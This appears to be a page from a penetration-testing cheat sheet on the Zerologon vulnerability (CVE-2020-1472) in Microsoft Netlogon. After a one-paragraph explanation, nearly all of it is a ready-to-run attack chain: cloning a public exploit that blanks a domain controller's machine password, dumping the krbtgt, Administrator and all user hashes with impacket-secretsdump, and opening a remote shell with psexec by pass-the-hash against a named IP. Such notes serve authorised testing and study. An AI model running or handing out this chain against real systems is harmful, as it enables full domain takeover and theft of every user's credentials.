zerologon - CVE-2020-1472

Theory

Zerologon is a vulnerability in the cryptography of Microsoft’s Netlogon process that allows an attack against Microsoft Active Directory domain controllers. Zerologon makes it possible for a hacker to impersonate any computer, including the root domain controller.

More: https://www.trendmicro.com/en_in/what-is/zerologon.html

Practical

Test for ZeroLogon Vulenrability

git clone https://github.com/SecuraBV/CVE-2020-1472.git

cd CVE-2020-1472

pip3 install -r requirements.txt

./zerologon_tester.py EXAMPLE-DC 1.2.3.4

Exploit ZeroLogon Vulenrability

git clone https://github.com/risksense/zerologon.git

pip3 install -r requirements.txt

python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

Dump Password Hashes

# Dump krbtgt user hash
sudo impacket-secretsdump -no-pass 'DC-ZEROLOGON$'@212.129.28.18 -just-dc-user krbtgt

# Dump Administrator user hash
sudo impacket-secretsdump -no-pass 'DC-ZEROLOGON$'@212.129.28.18 -just-dc-user Administrator

# Dump All users hashes
sudo impacket-secretsdump -no-pass 'DC-ZEROLOGON$'@212.129.28.18

Remote Shell

./psexec.py /Administrator@212.129.28.18 -hashes aad3b435b51404eeaad3b435b51404ee:777b1935ff37faba2b2c299288b0693b

REFERENCES

Previousproftpd-1.3.3c-backdoorNextApache Ghostcat - CVE 2020-1938

Last updated